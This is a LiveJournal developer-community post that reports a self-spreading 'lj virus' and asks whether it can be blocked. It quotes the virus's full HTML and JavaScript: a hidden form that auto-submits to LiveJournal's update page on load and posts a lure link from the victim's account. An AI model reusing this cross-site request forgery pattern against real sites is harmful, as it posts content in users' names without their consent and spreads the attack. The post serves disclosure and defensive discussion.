ntang (ntang) wrote in lj_dev,
ntang
ntang
lj_dev

"lj virus"

So people know, there's an "lj virus" now. It's just a bit of javascript that submits a new entry for you.

Here's the main page:

http://www.geocities.com/ljbuster2002/lj.html

Here's the actual page that adds the entry for you:

http://www.geocities.com/ljbuster2002/ljtest.html

Just make sure you have javascript turned off, or use wget or something to grab the actual source.

So, my question is: is it worth trying to block this sort of thing? Can we even block it, without blocking valid clients as well? Should we?

<html>

<script>

function doLoad()
{
  document.testform.submit();
}

function doOverwrite()
{
  document.open();
  document.write('<html><body bgcolor="#336699">:)</body></html>');
  document.close;
}

</script>

<!-- ljbuster2002, the one and only -->
<!-- if you are seeing this, congratulations.  you must be pretty smart, or pretty
     lucky.  not everyone has two brain cells to rub together.  this, my friend, is
     classified as an experiment.  an adventure into the mundane that is daily life
     to see what can be gathered, what can be learned.  to seek knowledge is the only
     way of life, and to find it is the way to salvation.  who am i?  i am me.  that
     is all you need to know.  if you find out who i am, just remember, you just
     embarked on a pursuit of knowledge.  you're smarter now.  congratulations.  -->

<body onLoad="doLoad();" onUnload="doOverwrite();" bgcolor="#336699">
  <form method="post" action="http://www.livejournal.com/update.bml" name="testform">
  <input type=hidden name=mode value=update>
  <input type=hidden name=oldmode value=>
  <input type=hidden name=year value=2003>
  <input type=hidden name=mon value=6>
  <input type=hidden name=day value=19>
  <input type=hidden name=hour value=10>
  <input type=hidden name=min value=45>
  <input type=hidden name=security value=friends> 
  <input type=hidden name=prop_opt_noemail value=1>  
  <textarea name=event>  
Heh.<p><a href="http://www.geocities.com/ljbuster2002/lj.html">I've contracted an incurable virus!  Click here to see if you have, too!</a>
  </textarea>
  </form>

</body>

</html><!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://us.geocities.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.com/visit.gif?1024672634" border=0 width=1 height=1></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1024672634" ALT=1 WIDTH=1 HEIGHT=1>
Subscribe
  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

  • 19 comments